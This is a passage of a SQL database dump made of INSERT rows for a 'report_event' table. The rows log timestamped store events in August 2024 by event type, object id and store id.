(12454, '2024-08-02 14:49:26', 1, 2062, 0, 1, 1),
(12455, '2024-08-02 14:49:29', 1, 2061, 0, 1, 1),
(12456, '2024-08-02 14:49:31', 1, 2060, 0, 1, 1),
(12457, '2024-08-02 14:49:33', 1, 2059, 0, 1, 1),
(12458, '2024-08-02 14:49:35', 1, 2058, 0, 1, 1),
(12459, '2024-08-02 14:49:38', 1, 2055, 0, 1, 1),
(12460, '2024-08-02 14:49:40', 1, 2054, 0, 1, 1),
(12461, '2024-08-02 14:49:53', 1, 2064, 0, 1, 1),
(12462, '2024-08-02 14:49:55', 1, 2063, 0, 1, 1),
(12463, '2024-08-02 14:49:57', 1, 2062, 0, 1, 1),
(12464, '2024-08-02 14:49:59', 1, 2061, 0, 1, 1),
(12465, '2024-08-02 14:50:02', 1, 2060, 0, 1, 1),
(12466, '2024-08-02 14:50:04', 1, 2059, 0, 1, 1),
(12467, '2024-08-02 14:50:07', 1, 2058, 0, 1, 1),
(12468, '2024-08-02 14:50:10', 1, 2055, 0, 1, 1),
(12469, '2024-08-02 14:50:13', 1, 2054, 0, 1, 1),
(12470, '2024-08-02 14:50:27', 1, 2064, 0, 1, 1),
(12471, '2024-08-02 14:50:30', 1, 2063, 0, 1, 1),
(12472, '2024-08-02 14:50:33', 1, 2062, 0, 1, 1),
(12473, '2024-08-02 14:50:35', 1, 2061, 0, 1, 1),
(12474, '2024-08-02 14:50:37', 1, 2060, 0, 1, 1),
(12475, '2024-08-02 14:50:41', 1, 2059, 0, 1, 1),
(12476, '2024-08-02 14:50:43', 1, 2058, 0, 1, 1),
(12477, '2024-08-02 14:50:46', 1, 2055, 0, 1, 1),
(12478, '2024-08-02 14:50:51', 1, 2054, 0, 1, 1),
(12479, '2024-08-02 14:51:06', 1, 2064, 0, 1, 1),
(12480, '2024-08-02 14:51:09', 1, 2063, 0, 1, 1),
(12481, '2024-08-02 14:51:12', 1, 2062, 0, 1, 1),
(12482, '2024-08-02 14:51:16', 1, 2061, 0, 1, 1),
(12483, '2024-08-02 14:51:19', 1, 2060, 0, 1, 1),
(12484, '2024-08-02 14:51:21', 1, 2059, 0, 1, 1),
(12485, '2024-08-02 14:51:24', 1, 2058, 0, 1, 1),
(12486, '2024-08-02 14:51:27', 1, 2055, 0, 1, 1),
(12487, '2024-08-02 14:51:30', 1, 2054, 0, 1, 1),
(12488, '2024-08-02 14:51:34', 1, 2064, 0, 1, 1),
(12489, '2024-08-02 14:51:39', 1, 2058, 0, 1, 1),
(12490, '2024-08-02 14:51:42', 1, 2059, 0, 1, 1),
(12491, '2024-08-02 14:51:45', 1, 2060, 0, 1, 1),
(12492, '2024-08-02 14:51:48', 1, 2061, 0, 1, 1),
(12493, '2024-08-02 14:51:51', 1, 2062, 0, 1, 1),
(12494, '2024-08-02 14:51:53', 1, 2063, 0, 1, 1),
(12495, '2024-08-02 14:52:01', 1, 2064, 0, 1, 1),
(12496, '2024-08-02 14:52:04', 1, 2063, 0, 1, 1),
(12497, '2024-08-02 14:52:07', 1, 2062, 0, 1, 1),
(12498, '2024-08-02 14:52:09', 1, 2061, 0, 1, 1),
(12499, '2024-08-02 14:52:14', 1, 2060, 0, 1, 1),
(12500, '2024-08-02 14:52:17', 1, 2059, 0, 1, 1),
(12501, '2024-08-02 14:52:20', 1, 2058, 0, 1, 1),
(12502, '2024-08-02 14:52:24', 1, 2055, 0, 1, 1),
(12503, '2024-08-02 14:52:27', 1, 2054, 0, 1, 1),
(12504, '2024-08-02 14:52:30', 1, 2064, 0, 1, 1),
(12505, '2024-08-02 14:52:33', 1, 2058, 0, 1, 1),
(12506, '2024-08-02 14:52:36', 1, 2059, 0, 1, 1),
(12507, '2024-08-02 14:52:39', 1, 2060, 0, 1, 1),
(12508, '2024-08-02 14:52:42', 1, 2061, 0, 1, 1),
(12509, '2024-08-02 14:52:44', 1, 2062, 0, 1, 1),
(12510, '2024-08-02 14:52:48', 1, 2063, 0, 1, 1),
(12511, '2024-08-02 14:52:58', 4, 2054, 0, 1, 1),
(12512, '2024-08-03 09:18:56', 1, 2058, 0, 1, 1),
(12513, '2024-08-03 09:20:54', 1, 2059, 0, 1, 1),
(12514, '2024-08-03 09:21:17', 1, 2058, 0, 1, 1),
(12515, '2024-08-03 09:21:28', 1, 2063, 0, 1, 1),
(12516, '2024-08-03 09:21:40', 1, 2062, 0, 1, 1),
(12517, '2024-08-03 09:21:53', 1, 2054, 0, 1, 1),
(12518, '2024-08-03 09:22:05', 1, 2064, 0, 1, 1),
(12519, '2024-08-03 09:23:14', 1, 2064, 0, 1, 1),
(12520, '2024-08-03 09:23:32', 1, 2061, 0, 1, 1),
(12521, '2024-08-03 09:23:44', 1, 2058, 0, 1, 1),
(12522, '2024-08-03 09:23:56', 1, 2055, 0, 1, 1),
(12523, '2024-08-03 09:24:13', 1, 2060, 0, 1, 1),
(12524, '2024-08-03 09:24:25', 1, 2055, 0, 1, 1),
(12525, '2024-08-03 09:24:53', 1, 2064, 0, 1, 1),
(12526, '2024-08-03 09:25:08', 1, 2063, 0, 1, 1),
(12527, '2024-08-03 09:25:20', 1, 2062, 0, 1, 1),
(12528, '2024-08-03 09:25:32', 1, 2061, 0, 1, 1),
(12529, '2024-08-03 09:25:44', 1, 2060, 0, 1, 1),
(12530, '2024-08-03 09:25:56', 1, 2059, 0, 1, 1),
(12531, '2024-08-03 09:26:08', 1, 2058, 0, 1, 1),
(12532, '2024-08-03 09:26:19', 1, 2055, 0, 1, 1),
(12533, '2024-08-03 09:26:31', 1, 2054, 0, 1, 1),
(12534, '2024-08-03 09:26:44', 1, 2053, 0, 1, 1),
(12535, '2024-08-03 09:26:56', 1, 2061, 0, 1, 1),
(12536, '2024-08-03 09:27:57', 1, 2064, 0, 1, 1),
(12537, '2024-08-03 09:28:12', 1, 2063, 0, 1, 1),
(12538, '2024-08-03 09:28:24', 1, 2062, 0, 1, 1),
(12539, '2024-08-03 09:28:37', 1, 2061, 0, 1, 1),
(12540, '2024-08-03 09:28:48', 1, 2060, 0, 1, 1),
(12541, '2024-08-03 09:29:01', 1, 2059, 0, 1, 1),
(12542, '2024-08-03 09:29:12', 1, 2058, 0, 1, 1),
(12543, '2024-08-03 09:29:24', 1, 2055, 0, 1, 1),
(12544, '2024-08-03 09:29:36', 1, 2054, 0, 1, 1),
(12545, '2024-08-03 09:30:09', 1, 2064, 0, 1, 1),
(12546, '2024-08-03 09:30:24', 1, 2063, 0, 1, 1),
(12547, '2024-08-03 09:30:35', 1, 2062, 0, 1, 1),
(12548, '2024-08-03 09:30:47', 1, 2061, 0, 1, 1),
(12549, '2024-08-03 09:30:59', 1, 2060, 0, 1, 1),
(12550, '2024-08-03 09:31:11', 1, 2059, 0, 1, 1),
(12551, '2024-08-03 09:31:23', 1, 2058, 0, 1, 1),
(12552, '2024-08-03 09:31:35', 1, 2055, 0, 1, 1),
(12553, '2024-08-03 09:31:47', 1, 2054, 0, 1, 1),
(12554, '2024-08-03 09:31:59', 1, 2064, 0, 1, 1),
(12555, '2024-08-03 09:32:14', 1, 2058, 0, 1, 1),
(12556, '2024-08-03 09:32:26', 1, 2059, 0, 1, 1),
(12557, '2024-08-03 09:32:39', 1, 2060, 0, 1, 1),
(12558, '2024-08-03 09:32:51', 1, 2061, 0, 1, 1),
(12559, '2024-08-03 09:33:03', 1, 2062, 0, 1, 1),
(12560, '2024-08-03 09:33:15', 1, 2063, 0, 1, 1),
(12561, '2024-08-03 09:33:37', 1, 2064, 0, 1, 1),
(12562, '2024-08-03 09:33:52', 1, 2058, 0, 1, 1),
(12563, '2024-08-03 09:34:04', 1, 2059, 0, 1, 1),
(12564, '2024-08-03 09:34:17', 1, 2060, 0, 1, 1),
(12565, '2024-08-03 09:34:30', 1, 2061, 0, 1, 1),
(12566, '2024-08-03 09:34:42', 1, 2062, 0, 1, 1),
(12567, '2024-08-03 09:34:55', 1, 2063, 0, 1, 1),
(12568, '2024-08-03 09:35:55', 1, 2064, 0, 1, 1),
(12569, '2024-08-03 09:36:11', 1, 2063, 0, 1, 1),
(12570, '2024-08-03 09:36:23', 1, 2062, 0, 1, 1),
(12571, '2024-08-03 09:36:36', 1, 2061, 0, 1, 1),
(12572, '2024-08-03 09:36:49', 1, 2060, 0, 1, 1),
(12573, '2024-08-03 09:37:01', 1, 2059, 0, 1, 1),
(12574, '2024-08-03 09:37:14', 1, 2058, 0, 1, 1),
(12575, '2024-08-03 09:37:27', 1, 2055, 0, 1, 1),
(12576, '2024-08-03 09:37:40', 1, 2054, 0, 1, 1),
(12577, '2024-08-03 09:38:57', 1, 2064, 0, 1, 1),
(12578, '2024-08-03 09:39:16', 1, 2063, 0, 1, 1),
(12579, '2024-08-03 09:39:28', 1, 2062, 0, 1, 1),
(12580, '2024-08-03 09:39:42', 1, 2061, 0, 1, 1),
(12581, '2024-08-03 09:39:55', 1, 2060, 0, 1, 1),
(12582, '2024-08-03 09:40:08', 1, 2059, 0, 1, 1),
(12583, '2024-08-03 09:40:21', 1, 2058, 0, 1, 1),
(12584, '2024-08-03 09:40:34', 1, 2055, 0, 1, 1),
(12585, '2024-08-03 09:40:47', 1, 2054, 0, 1, 1),
(12586, '2024-08-03 09:42:07', 1, 2064, 0, 1, 1),
(12587, '2024-08-03 09:42:22', 1, 2063, 0, 1, 1),
(12588, '2024-08-03 09:42:35', 1, 2062, 0, 1, 1),
(12589, '2024-08-03 09:42:48', 1, 2061, 0, 1, 1),
(12590, '2024-08-03 09:43:01', 1, 2060, 0, 1, 1),
(12591, '2024-08-03 09:43:13', 1, 2059, 0, 1, 1),
(12592, '2024-08-03 09:43:25', 1, 2058, 0, 1, 1),
(12593, '2024-08-03 09:43:38', 1, 2055, 0, 1, 1),
(12594, '2024-08-03 09:43:50', 1, 2054, 0, 1, 1),
(12595, '2024-08-03 09:44:06', 4, 2054, 0, 1, 1),
(12596, '2024-08-03 17:45:05', 1, 2059, 0, 1, 1),
(12597, '2024-08-03 17:46:05', 4, 2059, 2414, 1, 1),
(12598, '2024-08-03 18:10:14', 1, 2061, 0, 1, 1),
(12599, '2024-08-03 19:12:21', 1, 2064, 0, 1, 1),
(12600, '2024-08-03 19:13:56', 1, 2054, 0, 1, 1),
(12601, '2024-08-03 21:57:26', 1, 2060, 0, 1, 1),
(12602, '2024-08-04 00:18:55', 1, 2060, 0, 1, 1),
(12603, '2024-08-04 00:19:02', 1, 2062, 0, 1, 1),
(12604, '2024-08-04 00:19:13', 1, 2064, 0, 1, 1),
(12605, '2024-08-04 00:19:21', 1, 2063, 0, 1, 1),
(12606, '2024-08-04 00:19:27', 1, 2062, 0, 1, 1),
(12607, '2024-08-04 00:19:33', 1, 2061, 0, 1, 1),
(12608, '2024-08-04 00:19:39', 1, 2060, 0, 1, 1),
(12609, '2024-08-04 00:19:44', 1, 2059, 0, 1, 1),
(12610, '2024-08-04 00:19:50', 1, 2058, 0, 1, 1),
(12611, '2024-08-04 00:20:03', 1, 2064, 0, 1, 1),
(12612, '2024-08-04 00:20:09', 1, 2063, 0, 1, 1),
(12613, '2024-08-04 00:20:14', 1, 2062, 0, 1, 1),
(12614, '2024-08-04 00:20:20', 1, 2061, 0, 1, 1),
(12615, '2024-08-04 00:20:24', 1, 2060, 0, 1, 1),
(12616, '2024-08-04 00:20:33', 1, 2064, 0, 1, 1),
(12617, '2024-08-04 00:20:39', 1, 2058, 0, 1, 1),
(12618, '2024-08-04 00:20:45', 1, 2059, 0, 1, 1),
(12619, '2024-08-04 00:20:50', 1, 2060, 0, 1, 1),
(12620, '2024-08-04 00:20:55', 1, 2061, 0, 1, 1),
(12621, '2024-08-04 00:21:00', 1, 2062, 0, 1, 1),
(12622, '2024-08-04 00:21:05', 1, 2063, 0, 1, 1),
(12623, '2024-08-04 00:21:14', 1, 2059, 0, 1, 1),
(12624, '2024-08-04 00:21:23', 1, 2061, 0, 1, 1),
(12625, '2024-08-04 00:21:33', 1, 2064, 0, 1, 1),
(12626, '2024-08-04 00:21:40', 1, 2061, 0, 1, 1),
(12627, '2024-08-04 00:21:45', 1, 2058, 0, 1, 1),
(12628, '2024-08-04 00:21:50', 1, 2055, 0, 1, 1),
(12629, '2024-08-04 00:21:55', 1, 2063, 0, 1, 1),
(12630, '2024-08-04 00:22:00', 1, 2054, 0, 1, 1),
(12631, '2024-08-04 00:22:10', 1, 2058, 0, 1, 1),
(12632, '2024-08-04 00:22:15', 1, 2055, 0, 1, 1),
(12633, '2024-08-04 00:22:36', 1, 2064, 0, 1, 1),
(12634, '2024-08-04 00:22:43', 1, 2063, 0, 1, 1),
(12635, '2024-08-04 00:22:48', 1, 2062, 0, 1, 1),
(12636, '2024-08-04 00:22:54', 1, 2061, 0, 1, 1),
(12637, '2024-08-04 00:22:59', 1, 2060, 0, 1, 1),
(12638, '2024-08-04 00:23:04', 1, 2059, 0, 1, 1),
(12639, '2024-08-04 00:23:10', 1, 2058, 0, 1, 1),
(12640, '2024-08-04 00:23:16', 1, 2055, 0, 1, 1),
(12641, '2024-08-04 00:23:21', 1, 2054, 0, 1, 1),
(12642, '2024-08-04 00:23:29', 1, 2064, 0, 1, 1),
(12643, '2024-08-04 00:23:37', 1, 2058, 0, 1, 1),
(12644, '2024-08-04 00:23:42', 1, 2059, 0, 1, 1),
(12645, '2024-08-04 00:23:47', 1, 2060, 0, 1, 1),
(12646, '2024-08-04 00:23:52', 1, 2061, 0, 1, 1),
(12647, '2024-08-04 00:23:57', 1, 2062, 0, 1, 1),
(12648, '2024-08-04 00:24:02', 1, 2063, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(12649, '2024-08-04 00:24:24', 1, 2064, 0, 1, 1),
(12650, '2024-08-04 00:24:31', 1, 2058, 0, 1, 1),
(12651, '2024-08-04 00:24:36', 1, 2059, 0, 1, 1),
(12652, '2024-08-04 00:24:42', 1, 2060, 0, 1, 1),
(12653, '2024-08-04 00:24:48', 1, 2061, 0, 1, 1),
(12654, '2024-08-04 00:24:53', 1, 2062, 0, 1, 1),
(12655, '2024-08-04 00:24:59', 1, 2063, 0, 1, 1),
(12656, '2024-08-04 00:25:12', 1, 2064, 0, 1, 1),
(12657, '2024-08-04 00:25:19', 1, 2063, 0, 1, 1),
(12658, '2024-08-04 00:25:24', 1, 2062, 0, 1, 1),
(12659, '2024-08-04 00:25:30', 1, 2061, 0, 1, 1),
(12660, '2024-08-04 00:25:35', 1, 2060, 0, 1, 1),
(12661, '2024-08-04 00:25:40', 1, 2059, 0, 1, 1),
(12662, '2024-08-04 00:25:46', 1, 2058, 0, 1, 1),
(12663, '2024-08-04 00:25:52', 1, 2055, 0, 1, 1),
(12664, '2024-08-04 00:25:58', 1, 2054, 0, 1, 1),
(12665, '2024-08-04 00:26:19', 4, 2054, 0, 1, 1),
(12666, '2024-08-04 04:24:04', 1, 2062, 0, 1, 1),
(12667, '2024-08-04 04:24:07', 1, 2064, 0, 1, 1),
(12668, '2024-08-04 04:24:10', 1, 2059, 0, 1, 1),
(12669, '2024-08-04 04:24:19', 1, 2058, 0, 1, 1),
(12670, '2024-08-04 04:24:22', 1, 2061, 0, 1, 1),
(12671, '2024-08-04 04:24:28', 1, 2054, 0, 1, 1),
(12672, '2024-08-04 04:24:34', 1, 2060, 0, 1, 1),
(12673, '2024-08-04 04:24:38', 1, 2063, 0, 1, 1),
(12674, '2024-08-04 04:24:42', 1, 2064, 0, 1, 1),
(12675, '2024-08-04 04:24:50', 1, 2064, 0, 1, 1),
(12676, '2024-08-04 04:24:52', 1, 2055, 0, 1, 1),
(12677, '2024-08-04 04:32:51', 1, 2054, 0, 1, 1),
(12678, '2024-08-04 05:00:58', 1, 2060, 0, 1, 1),
(12679, '2024-08-04 05:31:25', 1, 2061, 0, 1, 1),
(12680, '2024-08-04 06:20:11', 1, 2059, 0, 1, 1),
(12681, '2024-08-04 06:35:13', 1, 2058, 0, 1, 1),
(12682, '2024-08-04 06:55:15', 1, 2064, 0, 1, 1),
(12683, '2024-08-04 07:28:34', 1, 2062, 0, 1, 1),
(12684, '2024-08-04 08:19:53', 1, 2055, 0, 1, 1),
(12685, '2024-08-04 08:39:34', 1, 2064, 0, 1, 1),
(12686, '2024-08-04 08:44:33', 1, 2054, 0, 1, 1),
(12687, '2024-08-04 09:02:23', 1, 2063, 0, 1, 1),
(12688, '2024-08-04 09:14:21', 1, 2058, 0, 1, 1),
(12689, '2024-08-04 12:19:07', 1, 2062, 0, 1, 1),
(12690, '2024-08-04 19:16:41', 1, 2058, 0, 1, 1),
(12691, '2024-08-05 00:10:49', 1, 2062, 0, 1, 1),
(12692, '2024-08-05 06:11:17', 1, 2061, 0, 1, 1),
(12693, '2024-08-05 12:28:13', 1, 2054, 0, 1, 1),
(12694, '2024-08-05 17:02:09', 1, 2058, 0, 1, 1),
(12695, '2024-08-05 17:02:35', 1, 2061, 0, 1, 1),
(12696, '2024-08-05 17:02:43', 1, 2059, 0, 1, 1),
(12697, '2024-08-05 17:02:50', 1, 2058, 0, 1, 1),
(12698, '2024-08-05 17:02:58', 1, 2054, 0, 1, 1),
(12699, '2024-08-05 17:03:05', 1, 2062, 0, 1, 1),
(12700, '2024-08-05 17:03:25', 1, 2064, 0, 1, 1),
(12701, '2024-08-05 17:03:35', 1, 2063, 0, 1, 1),
(12702, '2024-08-05 17:03:42', 1, 2062, 0, 1, 1),
(12703, '2024-08-05 17:03:52', 1, 2061, 0, 1, 1),
(12704, '2024-08-05 17:03:59', 1, 2060, 0, 1, 1),
(12705, '2024-08-05 17:04:07', 1, 2059, 0, 1, 1),
(12706, '2024-08-05 17:04:14', 1, 2058, 0, 1, 1),
(12707, '2024-08-05 17:04:22', 1, 2055, 0, 1, 1),
(12708, '2024-08-05 17:04:31', 1, 2054, 0, 1, 1),
(12709, '2024-08-05 17:04:38', 1, 2053, 0, 1, 1),
(12710, '2024-08-05 17:04:46', 1, 2059, 0, 1, 1),
(12711, '2024-08-05 17:04:53', 1, 2055, 0, 1, 1),
(12712, '2024-08-05 17:05:16', 1, 2064, 0, 1, 1),
(12713, '2024-08-05 17:05:25', 1, 2061, 0, 1, 1),
(12714, '2024-08-05 17:05:35', 1, 2058, 0, 1, 1),
(12715, '2024-08-05 17:05:43', 1, 2055, 0, 1, 1),
(12716, '2024-08-05 17:05:57', 1, 2064, 0, 1, 1),
(12717, '2024-08-05 17:06:08', 1, 2058, 0, 1, 1),
(12718, '2024-08-05 17:06:15', 1, 2059, 0, 1, 1),
(12719, '2024-08-05 17:06:24', 1, 2060, 0, 1, 1),
(12720, '2024-08-05 17:06:32', 1, 2061, 0, 1, 1),
(12721, '2024-08-05 17:06:39', 1, 2062, 0, 1, 1),
(12722, '2024-08-05 17:06:46', 1, 2063, 0, 1, 1),
(12723, '2024-08-05 17:06:53', 1, 2054, 0, 1, 1),
(12724, '2024-08-05 17:06:59', 1, 2060, 0, 1, 1),
(12725, '2024-08-05 17:07:06', 1, 2061, 0, 1, 1),
(12726, '2024-08-05 17:07:13', 1, 2063, 0, 1, 1),
(12727, '2024-08-05 17:08:47', 1, 2064, 0, 1, 1),
(12728, '2024-08-05 17:08:48', 1, 2063, 0, 1, 1),
(12729, '2024-08-05 17:08:55', 1, 2062, 0, 1, 1),
(12730, '2024-08-05 17:09:01', 1, 2061, 0, 1, 1),
(12731, '2024-08-05 17:09:08', 1, 2060, 0, 1, 1),
(12732, '2024-08-05 17:09:15', 1, 2059, 0, 1, 1),
(12733, '2024-08-05 17:09:22', 1, 2058, 0, 1, 1),
(12734, '2024-08-05 17:09:29', 1, 2055, 0, 1, 1),
(12735, '2024-08-05 17:09:36', 1, 2054, 0, 1, 1),
(12736, '2024-08-05 17:25:49', 1, 2054, 0, 1, 1),
(12737, '2024-08-05 17:40:15', 1, 2064, 0, 1, 1),
(12738, '2024-08-05 17:40:23', 1, 2058, 0, 1, 1),
(12739, '2024-08-05 17:40:29', 1, 2059, 0, 1, 1),
(12740, '2024-08-05 17:40:36', 1, 2060, 0, 1, 1),
(12741, '2024-08-05 17:40:43', 1, 2061, 0, 1, 1),
(12742, '2024-08-05 17:40:50', 1, 2062, 0, 1, 1),
(12743, '2024-08-05 17:40:56', 1, 2063, 0, 1, 1),
(12744, '2024-08-05 17:41:20', 1, 2064, 0, 1, 1),
(12745, '2024-08-05 17:41:27', 1, 2058, 0, 1, 1),
(12746, '2024-08-05 17:41:34', 1, 2059, 0, 1, 1),
(12747, '2024-08-05 17:41:41', 1, 2060, 0, 1, 1),
(12748, '2024-08-05 17:41:47', 1, 2061, 0, 1, 1),
(12749, '2024-08-05 17:41:54', 1, 2062, 0, 1, 1),
(12750, '2024-08-05 17:42:00', 1, 2063, 0, 1, 1),
(12751, '2024-08-05 17:42:23', 4, 2054, 0, 1, 1),
(12752, '2024-08-05 19:31:46', 1, 2059, 0, 1, 1),
(12753, '2024-08-05 21:43:18', 1, 2054, 0, 1, 1),
(12754, '2024-08-06 02:45:33', 1, 2063, 0, 1, 1),
(12755, '2024-08-06 03:08:51', 1, 2060, 0, 1, 1),
(12756, '2024-08-06 04:00:42', 1, 2055, 0, 1, 1),
(12757, '2024-08-06 05:40:39', 1, 2055, 0, 1, 1),
(12758, '2024-08-06 09:56:58', 1, 2054, 0, 1, 1),
(12759, '2024-08-06 11:16:45', 1, 2062, 0, 1, 1),
(12760, '2024-08-06 11:38:13', 1, 2063, 0, 1, 1),
(12761, '2024-08-06 13:39:41', 1, 2062, 0, 1, 1),
(12762, '2024-08-06 13:39:59', 1, 2064, 0, 1, 1),
(12763, '2024-08-06 13:40:09', 1, 2063, 0, 1, 1),
(12764, '2024-08-06 13:40:17', 1, 2062, 0, 1, 1),
(12765, '2024-08-06 13:40:25', 1, 2061, 0, 1, 1),
(12766, '2024-08-06 13:40:32', 1, 2054, 0, 1, 1),
(12767, '2024-08-06 13:40:39', 1, 2058, 0, 1, 1),
(12768, '2024-08-06 13:40:57', 1, 2064, 0, 1, 1),
(12769, '2024-08-06 13:41:10', 1, 2061, 0, 1, 1),
(12770, '2024-08-06 13:41:19', 1, 2058, 0, 1, 1),
(12771, '2024-08-06 13:41:28', 1, 2055, 0, 1, 1),
(12772, '2024-08-06 13:41:44', 1, 2064, 0, 1, 1),
(12773, '2024-08-06 13:41:53', 1, 2063, 0, 1, 1),
(12774, '2024-08-06 13:42:00', 1, 2062, 0, 1, 1),
(12775, '2024-08-06 13:42:07', 1, 2061, 0, 1, 1),
(12776, '2024-08-06 13:42:14', 1, 2060, 0, 1, 1),
(12777, '2024-08-06 13:42:30', 1, 2061, 0, 1, 1),
(12778, '2024-08-06 13:42:39', 1, 2059, 0, 1, 1),
(12779, '2024-08-06 13:42:48', 1, 2058, 0, 1, 1),
(12780, '2024-08-06 13:42:54', 1, 2054, 0, 1, 1),
(12781, '2024-08-06 13:43:05', 1, 2055, 0, 1, 1),
(12782, '2024-08-06 13:43:11', 1, 2063, 0, 1, 1),
(12783, '2024-08-06 13:43:17', 1, 2064, 0, 1, 1),
(12784, '2024-08-06 13:43:25', 1, 2058, 0, 1, 1),
(12785, '2024-08-06 13:43:30', 1, 2059, 0, 1, 1),
(12786, '2024-08-06 13:43:37', 1, 2060, 0, 1, 1),
(12787, '2024-08-06 13:43:43', 1, 2061, 0, 1, 1),
(12788, '2024-08-06 13:43:49', 1, 2062, 0, 1, 1),
(12789, '2024-08-06 13:43:56', 1, 2063, 0, 1, 1),
(12790, '2024-08-06 13:44:03', 1, 2061, 0, 1, 1),
(12791, '2024-08-06 13:44:09', 1, 2059, 0, 1, 1),
(12792, '2024-08-06 13:44:15', 1, 2060, 0, 1, 1),
(12793, '2024-08-06 13:44:52', 1, 2064, 0, 1, 1),
(12794, '2024-08-06 13:45:00', 1, 2063, 0, 1, 1),
(12795, '2024-08-06 13:45:06', 1, 2062, 0, 1, 1),
(12796, '2024-08-06 13:45:12', 1, 2061, 0, 1, 1),
(12797, '2024-08-06 13:45:18', 1, 2060, 0, 1, 1),
(12798, '2024-08-06 13:45:24', 1, 2059, 0, 1, 1),
(12799, '2024-08-06 13:45:30', 1, 2058, 0, 1, 1),
(12800, '2024-08-06 13:45:36', 1, 2055, 0, 1, 1),
(12801, '2024-08-06 13:45:43', 1, 2054, 0, 1, 1),
(12802, '2024-08-06 13:45:55', 1, 2064, 0, 1, 1),
(12803, '2024-08-06 13:46:03', 1, 2058, 0, 1, 1),
(12804, '2024-08-06 13:46:10', 1, 2059, 0, 1, 1),
(12805, '2024-08-06 13:46:16', 1, 2060, 0, 1, 1),
(12806, '2024-08-06 13:46:23', 1, 2061, 0, 1, 1),
(12807, '2024-08-06 13:46:29', 1, 2062, 0, 1, 1),
(12808, '2024-08-06 13:46:36', 1, 2063, 0, 1, 1),
(12809, '2024-08-06 13:47:05', 1, 2064, 0, 1, 1),
(12810, '2024-08-06 13:47:14', 1, 2063, 0, 1, 1),
(12811, '2024-08-06 13:47:20', 1, 2062, 0, 1, 1),
(12812, '2024-08-06 13:47:26', 1, 2061, 0, 1, 1),
(12813, '2024-08-06 13:47:33', 1, 2060, 0, 1, 1),
(12814, '2024-08-06 13:47:39', 1, 2059, 0, 1, 1),
(12815, '2024-08-06 13:47:45', 1, 2058, 0, 1, 1),
(12816, '2024-08-06 13:47:52', 1, 2055, 0, 1, 1),
(12817, '2024-08-06 13:47:58', 1, 2054, 0, 1, 1),
(12818, '2024-08-06 13:48:04', 1, 2064, 0, 1, 1),
(12819, '2024-08-06 13:48:11', 1, 2058, 0, 1, 1),
(12820, '2024-08-06 13:48:17', 1, 2059, 0, 1, 1),
(12821, '2024-08-06 13:48:23', 1, 2060, 0, 1, 1),
(12822, '2024-08-06 13:48:29', 1, 2061, 0, 1, 1),
(12823, '2024-08-06 13:48:35', 1, 2062, 0, 1, 1),
(12824, '2024-08-06 13:48:41', 1, 2063, 0, 1, 1),
(12825, '2024-08-06 13:49:16', 4, 2054, 0, 1, 1),
(12826, '2024-08-06 17:34:24', 1, 2054, 0, 1, 1),
(12827, '2024-08-06 20:49:24', 1, 2054, 0, 1, 1),
(12828, '2024-08-07 08:00:31', 1, 2064, 0, 1, 1),
(12829, '2024-08-07 12:30:04', 1, 2061, 0, 1, 1),
(12830, '2024-08-07 16:00:28', 1, 2054, 0, 1, 1),
(12831, '2024-08-07 19:02:54', 1, 2054, 0, 1, 1),
(12832, '2024-08-07 19:38:32', 1, 2058, 0, 1, 1),
(12833, '2024-08-08 02:39:57', 1, 2055, 0, 1, 1),
(12834, '2024-08-08 02:40:11', 1, 2064, 0, 1, 1),
(12835, '2024-08-08 02:40:17', 1, 2063, 0, 1, 1),
(12836, '2024-08-08 02:40:20', 1, 2062, 0, 1, 1),
(12837, '2024-08-08 02:40:25', 1, 2060, 0, 1, 1),
(12838, '2024-08-08 05:21:01', 1, 2055, 0, 1, 1),
(12839, '2024-08-08 10:57:46', 1, 2054, 0, 1, 1),
(12840, '2024-08-08 13:21:14', 1, 2058, 0, 1, 1),
(12841, '2024-08-08 14:46:49', 1, 2064, 0, 1, 1),
(12842, '2024-08-08 17:00:38', 1, 2064, 0, 1, 1),
(12843, '2024-08-08 18:19:18', 1, 2055, 0, 1, 1),
(12844, '2024-08-08 18:39:10', 1, 2064, 0, 1, 1),
(12845, '2024-08-08 23:05:18', 1, 2058, 0, 1, 1),
(12846, '2024-08-09 00:17:23', 1, 2054, 0, 1, 1),
(12847, '2024-08-09 00:34:41', 1, 2054, 0, 1, 1),
(12848, '2024-08-09 02:14:36', 1, 2062, 0, 1, 1),
(12849, '2024-08-09 04:48:12', 1, 2059, 0, 1, 1),
(12850, '2024-08-09 07:09:47', 1, 2058, 0, 1, 1),
(12851, '2024-08-09 08:29:48', 1, 2061, 0, 1, 1),
(12852, '2024-08-09 09:29:46', 1, 2061, 0, 1, 1),
(12853, '2024-08-09 09:29:49', 1, 2059, 0, 1, 1),
(12854, '2024-08-09 09:29:54', 1, 2064, 0, 1, 1),
(12855, '2024-08-09 09:29:57', 1, 2061, 0, 1, 1),
(12856, '2024-08-09 09:30:00', 1, 2058, 0, 1, 1),
(12857, '2024-08-09 09:30:02', 1, 2055, 0, 1, 1),
(12858, '2024-08-09 09:30:07', 1, 2061, 0, 1, 1),
(12859, '2024-08-09 09:30:10', 1, 2059, 0, 1, 1),
(12860, '2024-08-09 09:30:12', 1, 2058, 0, 1, 1),
(12861, '2024-08-09 09:30:15', 1, 2054, 0, 1, 1),
(12862, '2024-08-09 09:30:17', 1, 2064, 0, 1, 1),
(12863, '2024-08-09 09:30:20', 1, 2058, 0, 1, 1),
(12864, '2024-08-09 09:30:23', 1, 2059, 0, 1, 1),
(12865, '2024-08-09 09:30:25', 1, 2060, 0, 1, 1),
(12866, '2024-08-09 09:30:28', 1, 2061, 0, 1, 1),
(12867, '2024-08-09 09:30:30', 1, 2062, 0, 1, 1),
(12868, '2024-08-09 09:30:32', 1, 2063, 0, 1, 1),
(12869, '2024-08-09 09:30:37', 1, 2063, 0, 1, 1),
(12870, '2024-08-09 09:30:43', 1, 2058, 0, 1, 1),
(12871, '2024-08-09 09:30:46', 1, 2054, 0, 1, 1),
(12872, '2024-08-09 09:30:48', 1, 2062, 0, 1, 1),
(12873, '2024-08-09 09:30:55', 1, 2064, 0, 1, 1),
(12874, '2024-08-09 09:30:58', 1, 2063, 0, 1, 1),
(12875, '2024-08-09 09:31:01', 1, 2062, 0, 1, 1),
(12876, '2024-08-09 09:31:03', 1, 2061, 0, 1, 1),
(12877, '2024-08-09 09:31:05', 1, 2060, 0, 1, 1),
(12878, '2024-08-09 09:31:08', 1, 2059, 0, 1, 1),
(12879, '2024-08-09 09:31:10', 1, 2058, 0, 1, 1),
